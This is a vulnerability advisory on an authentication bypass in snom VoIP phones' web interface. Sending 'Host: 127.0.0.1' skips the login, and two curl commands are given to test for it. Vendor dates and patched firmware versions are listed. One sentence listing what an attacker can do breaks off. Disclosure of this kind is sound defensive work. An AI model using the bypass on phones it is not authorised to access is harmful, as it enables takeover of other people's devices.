#############################################################
#############################################################
#############################################################
The VoIP phones of snom technology AG can be configured, monitored
or controlled with a browser connecting to the built in web interface.
It is strongly recommended to enable authentication on the web
interface and to set a strong password.
By constructing a specially crafted HTTP request the authentication
of the web interface can be completely bypassed.
Access to the web interface without authentication enables a
malicious user to 2:
The web interface of the Snom VoIP/SIP phones is protected by
Basic Authentication or Digest Authentication.
The authentication can be completely bypassed by modifying the
HTTP request. A normal browser sets the request header "Host:"
to the IP address or the host name that is entered in the URL
field of the browser. If the request header is modified to
contain the value "Host: 127.0.0.1", all pages and functions
of the web interface can be reached without prompting the user
to authenticate.
curl -H "Host: 127.0.0.1" http://<IP address of phone>/
curl -k -H "Host: 127.0.0.1" https://<IP address of phone>/
-> if the phone is vulnerable, the index page of the web
interface is returned
-> if the phone is not vulnerable, an
"HTTP/1.1 401 Unauthorized" response is returned
Vendor Notified: March 19, 2009
Vendor Status: Replied on March 19 and March 30, vulnerability
confirmed
Vendor Response: Problem fixed in firmware version 7.1.39/7.3.14.
Problem will be fixed in version 6.
Patch available: Firmware upgrade to versions 6.5.20, 7.1.39, 7.3.14
and above